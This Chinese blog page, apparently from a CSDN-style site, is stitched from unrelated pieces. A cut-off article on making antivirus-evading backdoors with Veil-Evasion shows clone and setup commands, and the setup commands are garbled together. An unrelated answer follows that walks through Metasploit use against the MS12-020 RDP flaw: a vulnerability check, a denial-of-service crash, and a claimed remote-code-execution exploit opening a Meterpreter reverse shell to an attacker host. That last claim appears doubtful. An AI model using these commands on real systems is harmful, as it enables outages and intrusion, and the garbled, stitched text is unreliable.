免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室”

Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载:

git clone https://www.github.com/Veil-Framework/Veil-Evasion.git

图1

下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令:

复制代码
lscd Veil-Evasion/lscd setup/ls./setup.sh
  • 1
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSFMetasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值